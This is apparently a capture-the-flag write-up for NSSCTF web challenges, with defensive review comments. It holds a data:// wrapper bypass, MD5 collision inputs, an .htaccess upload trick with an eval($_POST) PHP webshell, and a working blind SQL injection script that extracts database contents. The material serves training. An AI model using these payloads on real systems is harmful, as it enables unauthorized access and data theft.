image-20240223135432801

[GDOUCTF 2023]泄露的伪装

image-20240223140312152

orzorz.php

<?php
// Challenge source as shown in the writeup. It reads the request parameter
// "cxk", treats it as a path, and prints $flag when the content read from
// that path equals "ctrl".
// NOTE(review): $flag is not assigned anywhere in these lines; presumably it
// is defined in a part of the file the page does not show. Confirm.

// Turns off all error reporting, so a failed read produces no warning.
error_reporting(0);
if(isset($_GET['cxk'])){
    // Request-controlled value, used below without any validation.
    $cxk=$_GET['cxk'];
    // file_get_contents() accepts PHP stream wrappers as well as local paths,
    // so whoever sends the request also chooses where the "file" content
    // comes from (the request shown in the writeup uses data://).
    // Defensive fix: never hand request data to a filesystem/stream function;
    // map the parameter to a fixed allowlist of server-side paths and reject
    // everything else.
    // The comparison is loose (==); === avoids type juggling on the result,
    // which is false when the read fails.
    if(file_get_contents($cxk)=="ctrl"){
        echo $flag;
    }else{
        echo "洗洗睡吧";
    }
}else{
    echo "nononoononoonono";
}
// NOTE(review): the text after the closing tag below matches the else-branch
// output; it is probably the rendered response captured with the listing.
?> nononoononoonono

http://node5.anna.nssctf.cn:28206/orzorz.php?cxk=data://text/plain,ctrl

[NISACTF 2022]level-up

线索在 robots.txt 里

md5强碰撞（两段不同的字节串，MD5 值完全相同；MD5 已不具备抗碰撞性，不应用于完整性或身份校验）

array1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&array2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

sha1强碰撞

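[SWPUCTF 2021 新生赛]easyupload3.0

下面两次上传说明服务端接受了 .htaccess 这一文件名：第一次上传改变了该目录的解析方式，第二次上传的 1.jpg 因此被当作 PHP 执行。防御上应对上传文件名做白名单校验并由服务端重命名，把上传目录放到 Web 根目录之外，并在该目录关闭 AllowOverride 和脚本执行。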

name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

SetHandler application/x-httpd-php

name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<?php eval($_POST['a']);phpinfo();?>
[SWPUCTF 2021 新生赛]error
import time
import requests
# Challenge endpoint from the writeup. The function below appends its payload
# directly to this string, i.e. to the value of the id parameter.
url = "http://node4.anna.nssctf.cn:28666/index.php?id=1"
def bool_sql_database_name():
    """Recover a database string one character at a time (boolean-based blind SQL injection).

    For each position i in range(100) the character code is binary-searched
    in 32..127: every probe appends a payload to the module-level ``url``,
    sends a GET request, and treats the presence of '.....' in the response
    body as "condition true". The prefix recovered so far is printed after
    each position. Nothing is returned.
    """
    # NOTE(review): the page lost this script's indentation; the nesting below
    # is reconstructed from the control flow. Confirm against the original.
    #
    # Defender's view: this only works because the id value is concatenated
    # into the SQL statement; a parameterized query makes the payload inert.
    # In access logs it shows up as a long run of near-identical GETs whose id
    # value contains ascii(substr(...)) and information_schema.
    global url  # url is only read in this function
    flag=""
    for i in range(100):
        # Search window for one character code.
        low = 32
        high = 127
        mid = (low + high) // 2
        while low < high:

            # Active probe: "is the code of character i of the schema list < mid?"
            payload = "' and if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},1,0) and 'a'='a".format(i,mid)
            # The commented lines below are the author's results and the
            # payloads for the later stages (tables, columns, flag value).
            #information_schema,mysql,performance_schema,test,test_db
            #payload = "' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='test'),{},1))<{},1,0) and 'a'='a".format(i,mid)
            #test_db->test_tb->id,flag,users
            #payload = "' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='test_db' and table_name='test_tb'),{},1))<{},1,0) and 'a'='a".format(i,mid)
            #test_db->test_tb->id,flag,users
            #payload = "' and if(ascii(substr((select flag from test_db.test_tb),{},1))<{},1,0) and 'a'='a".format(i,mid)

            res = requests.get(url + payload)
            # '.....' is presumably a placeholder for the page text that only
            # appears when the injected condition is true; the writeup does
            # not show the real marker.
            if '.....' in res.text:
                high = mid
            else:
                low = mid +1
            mid = (low + high) // 2

        # The loop ends with low == high == mid; the character appended is mid-1.
        flag += chr(mid-1)
        print(flag)
# Runs as soon as the script is executed; there is no __main__ guard.
bool_sql_database_name()